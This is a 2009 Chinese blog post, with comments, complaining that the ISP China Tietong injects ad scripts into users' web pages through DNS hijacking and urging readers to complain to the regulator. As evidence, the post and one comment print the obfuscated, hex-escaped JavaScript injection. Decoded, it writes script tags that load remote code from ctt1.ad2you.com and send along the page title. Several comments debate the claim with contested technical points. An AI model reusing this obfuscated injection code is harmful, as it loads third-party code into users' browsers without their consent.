七月
2
已打10050投诉铁通var _0xccce=挂马问题

Posted by wykslina(分享)
星期四, 七月 2nd, 2009...11:32 - 此文评论

今天一大早,午夜客就打了10050投诉铁通强制在DNS上挂马的问题。

var _0xccce=["\x67\x67","\x67\x64","\x63\x71","\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x63\x74\x74\x31\x2E\x61\x64\x32\x79\x6F\x75\x2E\x63\x6F\x6D\x2F\x69\x70\x75\x73\x68\x2E\x70\x68\x70\x3F\x73\x72\x63\x3D","\x26\x74\x3D","\x74\x69\x74\x6C\x65","\x26\x75\x3D\x25\x73","\x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65","\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27","\x25\x73"];

这段代码解密很简单,直接把 “\x” 全部替换成 “%“。然后用 UnEscape解密 。即可得到这段代码的真实广告代码。

广告代码的网址是 ctt1.ad2you.com

如果此网站被黑客入侵,所有铁通用户只要开IE就会中毒。到时所有铁通用户的QQ、游戏帐户、网上银行都将被无条件盗走。

昨天午夜客就打10050,电话一直无法转进去。被迫作罢,今天午夜客赶早打了10050投诉。

问他们铁通是否与 ad2you.com 及 allyes.com 有合作,在DNS上强制推广广告的事。

铁通的客服MM当然说没有接到这样的通知。问过客为何问这个问题。

午夜客一说我访问网站出问题,铁通客服MM马上问是午夜客是不是一段乱码的事。(看来投诉的人很多,她们心里有数!)

午夜客很肯定的告诉她,这不是乱码,这是挂马

 

如果他 ctt1.ad2you.com 网站被黑客种马,或是他 ctt1.ad2you.com 本身就强制挂马的话。所有铁通用户的电脑只要开IE就会中毒。

这种不耻行为要她给我马上解决。

客服MM口口声声的对午夜客讲,这不是木马。也与铁通无关。铁通没有对DNS做劫持。

午夜客懒得与她讨论这个事,反正她们上次派的二个工作人员上门来为午夜客解决铁通强制DNS推广右下角浮动 ctt1.ad2you.com 广告时,直接判定是午夜客的电脑中毒了。不是他们铁通所为的。

午夜客也没有指望他们这次会认错。

反正这铁通在DNS上挂马的代码:

var _0xccce=["\x67\x67","\x67\x64","\x63\x71","\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x63\x74\x74\x31\x2E\x61\x64\x32\x79\x6F\x75\x2E\x63\x6F\x6D\x2F\x69\x70\x75\x73\x68\x2E\x70\x68\x70\x3F\x73\x72\x63\x3D","\x26\x74\x3D","\x74\x69\x74\x6C\x65","\x26\x75\x3D\x25\x73","\x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65","\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27","\x25\x73"];var a=[_0xccce[0x0],_0xccce[0x1],_0xccce[0x2]];var s=_0xccce[0x3]+a[0x1]+_0xccce[0x4]+encodeURIComponent(document[_0xccce[0x5]])+”&u=pwhuyupymcre”+_0xccce[0x7];document[_0xccce[0x8]](s);s=_0xccce[0x9]+http://wyk.net.ru+_0xccce[0x7];document[_0xccce[0x8]](s);

 

有足够的证据来证明他铁通的龌龊手法劫持用户的DNS,非法在用户电脑终端上推广广告。与私闯民宅没有分别

从昨天午夜客的BLOG日志 铁通甚为无耻,强行挂马! 回复情况来看,铁通是大面积的做这种下流手段推广广告的。

这种事除非铁通终止推广广告,否则无法屏蔽的。打10050铁通是不会认错的。午夜客告诉大家一个办法,直接到工信部投诉铁通的非法在用户电脑上挂马行为。只要被投诉的多了,这个地区的年终奖金就会泡汤。只要投诉就会有人对铁通经理加压。号召大家到工信部多多投诉。

 

工信部投诉铁通非法DNS劫持

挂马推广广告地址:

 

http://dxss.miit.gov.cn:8080/LeaderMail/LeaderMail.jsp

 

 

家只要投诉的人多,铁通的经理就会被扣奖金。大家多多投诉,为自己的合法权益争取。万一铁通合作广告网站 Ad2You.Com 被黑客入侵挂马。用户只要开IE就会中毒,所有的QQ、游戏帐户、网上银行都将被盗。

后果非常非常的严重。这不是普通的DNS劫持,午夜客号召大家都去工作部投诉。网民的力量是伟大的!铁通现在归移动管理,移动本身就很黑。还在宽带上做这种无耻的推广赚广告费。太下流了!


Tags: , , , , , , , , , , , , , , , , , ,

 分享  本文RSS  引用TrackBack URL

Comments
vtv220 on 2009-07-02 @ 12:21 ☞囧第1楼 引用并回复此评论

本身我也以为是我电脑中毒,
可是如果是dns劫持的话
我换了opendns 208.67.222.222都不能解决。
。。。所以有点怀疑这种说法。
很郁闷。还老是提示说“该页上的脚本造成系统速度减慢,是否取消该脚本运行”
难道是这几天己被这个网页搞中毒了吗?

vtv220 on 2009-07-02 @ 12:22 ☞囧第2楼 引用并回复此评论

是广州铁通的没错。
己到工信部填了投诉单

android on 2009-07-02 @ 12:27 ☞囧第3楼 引用并回复此评论

n你申诉内容怎么写,广州铁通的用户也准备投诉下

vtv220 on 2009-07-02 @ 12:31 ☞囧第4楼 引用并回复此评论

var _0xccce=["%67%67","%67%64","%63%71","%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%27%6A%61%76%61%73%63%72%69%70%74%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%63%74%74%31%2E%61%64%32%79%6F%75%2E%63%6F%6D%2F%69%70%75%73%68%2E%70%68%70%3F%73%72%63%3D","%26%74%3D","%74%69%74%6C%65","%26%75%3D%25%73","%27%3E%3C%2F%73%63%72%69%70%74%3E","%77%72%69%74%65","%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%27%6A%61%76%61%73%63%72%69%70%74%27%20%73%72%63%3D%27","%25%73"];

vtv220 on 2009-07-02 @ 12:31 ☞囧第5楼 引用并回复此评论

var _0xccce=["gg","gd","cq","","write","<script language='javascript' src='","%s"];

vtv220 on 2009-07-02 @ 12:34 ☞囧第6楼 引用并回复此评论

无耻铁通,非说我是电脑中毒了。。我说我要投诉他,立马就说“你这个问题我会让技术部解决,没什么事先这样”挂了我电话..
非常无耻

起点 on 2009-07-02 @ 12:59 ☞囧第7楼 引用并回复此评论

我也去投诉

111 on 2009-07-02 @ 19:33 ☞囧第8楼 引用并回复此评论

无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html无耻铁通
本文转载自午夜客-WykSlina(Www.Ai.Net.Ru) 原文地址:http://blog.wyk.net.ru/WuYeKe-yida10050tousutietongvar_0xccceguamawenti.html

神兽 on 2009-07-02 @ 20:41 ☞囧第9楼 引用并回复此评论

午夜客,神兽说说自己举证的方法。
用VPN,换DNS
VPN没广告就说明是铁通的。

wykslina on 2009-07-02 @ 20:50 ☞囧第10楼 引用并回复此评论

@神兽: 白搭,铁通的技术员不会懂VPN是什么的。他们一个劲的装不懂。反正就跟客户讲一句话:你的电脑中毒了,我们铁通没有做任何推广广告!

我跟他们讲ARP他们都有点莫名!

vtv220 on 2009-07-14 @ 01:53 ☞囧第11楼 引用并回复此评论

原来是天门老乡。。。

dahaidao on 2009-08-05 @ 16:51 ☞囧第12楼 引用并回复此评论

你的说法有问题..
DNS 域名解析
他只有解析错域名的可能,但是没有在网页里面添加代码的可能.
如果他要赚广告费,那应大多数人都有这种情况,而且所有的网页都有同样的广告.
TCP/IP HTTP ROUTER 中间的环节你们懂多少.
好像电脑中毒开不机了 就说硬件有问题 要返厂 要去投诉电脑制造商 一样搞笑.

wykslina on 2009-08-05 @ 20:30 ☞囧第13楼 引用并回复此评论

@dahaidao:
1、解析域名错本地DNS根本没有这个能力。解析域名解是域名服务器才能解析错的事。
2、是很多人都有这样的事,随便搜索引擎一下DNS劫持就知道有多少了。
3、电脑中毒开不了机没有人会去投诉电脑制造商,最多拿回电脑经销商处。
4、你典型的不学无术!你不知道中国的电信运营商在宽带上做了多少手脚。电信打不开网页就弹互联新空的广告。铁通打不开网页就显示139邮箱及飞信的广告。网通打不开网页就显示联通的搜索页面。这全是他们在本地DNS做的手脚。

东莞铁通就直接在服务器上禁止了PING甚至禁止了tracert命令!

dahaidao on 2009-08-20 @ 10:25 ☞囧第14楼 引用并回复此评论

1.谁说没有本地DNS解析错域名 知道host文件干嘛用的吗?
2.我想知道说DNS劫持和回答者有一个权威人士吗?您知道DNS是怎么工作的吗?知道什么是级联树吗?
3.电脑中毒我只是做一个比较.您 就是这个映射.
4.我是主修计算机科学与网络的.我还不至于到了无知的地步.您打不开网页,他给您转向其他网页那是正常的..但是您打的开的网页 里面有广告那你别怪铁通..要是铁通的话搞鬼的话 应该所有网页都有广告..铁通也不是一个小公司.他至于弄的没人用吗?
我想请问您学的什么专业.估计计算机基础都没毕业吧…ping tracert这些命令对您有多少用处?屏蔽这些命令对服务器来说是很正常和安全的.

最后任何程序病毒 都可能造成广告.. 或者你们是局域网等容易受到ARP攻击
我不是专门再为铁通辩护,我只是看到这样的信息 感到很气愤..气愤你们自大..气愤你们无知..气愤您的误导.

dahaidao on 2009-08-20 @ 11:18 ☞囧第15楼 引用并回复此评论

维基百科 DNS劫持 http://zh.wikipedia.org/wiki/DNS%E5%8A%AB%E6%8C%81
域名劫持就是在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则直接返回假的IP地址或者什么也不做使得请求失去响应,其效果就是对特定的网址不能访问或访问的是假网址

dahaidao on 2009-08-20 @ 11:23 ☞囧第16楼 引用并回复此评论

就算是铁通的问题 那也不是DNS 请求地址后 数据封包 然后转发 到你机器上猫解包 除非在中间环节解包 然后加入广告代码才可以 硬路由一般没有这个功能 除非软路由 但是这样会严重影响性能

dahaidao on 2009-08-20 @ 11:25 ☞囧第17楼 引用并回复此评论

http://zhidao.baidu.com/question/99075471.html?fr=qrl&fr2=query
我用的是电信的,他们有时还劫持我的上网信息呢,连密码都劫持。
http://zhidao.baidu.com/question/104311664.html
文绉绉的词汇让人理解起来不易.通俗的说DNS劫持可以完成很多害人的事.举例某黑客拿下了网易的域名管理中心后台.163.com 然后自己做了个和网易一模一样的网站,申请个域名叫111.com..在网易后台把163.com转发到假网站111.com上..等着网易网友来输入密码登录帐号..从而窃取邮箱等一系列网友个人私密

这些也算DNS劫持?

我家也是铁通怎么我从来没碰到过?

dahaidao on 2009-08-20 @ 11:27 ☞囧第18楼 引用并回复此评论

例某黑客拿下了网易的域名管理中心后台
太搞笑了…DNS劫持风波..

dahaidao on 2009-08-20 @ 11:37 ☞囧第19楼 引用并回复此评论

sorry 上面有个错误 上面’例某黑客拿下了网易的域名管理中心后台’
的确算是DNS劫持 八成是被修改了HOST文件 或是被修改了DNS地址…DNS服务器被入侵 是很鲜见的.但是那句话也是用词不当的.

wykslina on 2009-08-20 @ 12:37 ☞囧第20楼 引用并回复此评论

看你这么自大,等你被管理了才知道在天朝一切皆有可能。

留下评论

(必需)

(必需)